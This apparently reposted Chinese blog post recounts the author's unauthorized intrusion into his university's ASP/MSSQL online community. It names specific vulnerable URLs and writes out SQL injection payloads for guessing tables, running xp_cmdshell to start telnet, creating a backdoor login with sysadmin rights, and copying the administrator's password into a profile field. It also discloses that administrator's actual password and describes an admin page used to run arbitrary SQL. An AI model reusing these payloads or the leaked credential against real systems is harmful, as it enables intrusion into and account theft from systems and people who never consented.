首页 电脑 电脑学堂 查看内容

我的一次入侵过程

2004-9-29 20:05 685 0

摘要: 渗透的是我们学校基于asp+mssql的虚拟社区--第二频道. 代码不公开.在对社区做了较全面的检测后,发现多个文件存在SQL注入式漏洞.涉及页面:http://www2.gliet.edu.cn/c...
关键词: 密码 select 思路 users master xuanliang fast where 权限 但是

渗透的是我们学校基于asp+mssql的虚拟社区--第二频道. 代码不公开.在对社区做了较全面的检测后,发现多个文件存在SQL注入式漏洞.涉及页面:http://www2.gliet.edu.cn/club2/bbs/plan_modi.asp ;http://www2.gliet.edu.cn/club2/diary/edit.asphttp://www2.gliet.edu.cn/club2/diary/diary_disp.asp下面是渗透过程的一些思路:思路一:首先是猜表名和列名.or 0<>(select count(*) from users)and 0<>(select count(*) from users where name<>'')and 0<>(select count(*) from users where psw<>'')之前猜到有一个user的列,但是却查不到任何用户.......后来觉得user有问题.继续猜其它列名,才知道有个name列.通过此列可以查询到任何用户.但是后来猜密码位数的时候失败了,密码设为任何位数都提示出错.没办法,只好换个思路了.思路二: exec master..xp_cmdshell 'net start telnet'--想用xp_cmdshell来启动服务器的TELNET服务.为验证可行性exec master..xp_cmdshell 'ping MyIP'--天网没日志.失败了思路三:exec master.dbo.sp_addlogin xuanliang;-- //显示正常exec master.dbo.sp_password null,xuanliang,killclub2;-- //显示正常exec master.dbo.sp_addsrvrolemember sysadmin xuanliang;-- //提示错误权限不够吧思路四:declare @t nvarchar(500);select @t=(select psw from users where name='fast');update users up oicq=@t where name='xuanliang';把fast的密码映射到我的oicq这项.提交后显示正常.查看我的个人资料OICQ项:pipa\.01 哈哈~这就是管理员fast的密码.well done.此时已经可以获得任意用户的密码了.但是在获得fast等其它高级权限ID的密码后却出现无法登陆的情况.应该有个限制了管理员登陆IP的处理.用fast登陆不了.但是换成FAST却可以了....进入了前台,可是一直猜不出后台存在的表.但是发现存在一个admin.asp页面很可疑.在普通权限下访问admin.asp提示"此功能尚未开通".但是在高级权限下就不同了.这是一个"测试页面".可以执行任意SQL语句.例如: select @@version 就看到了SQL的版本信息.select psw from users where name='qky' 这样就获得了另一个用户的密码.......对于,熟悉SQL语句的人来说,这就是后台了.
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部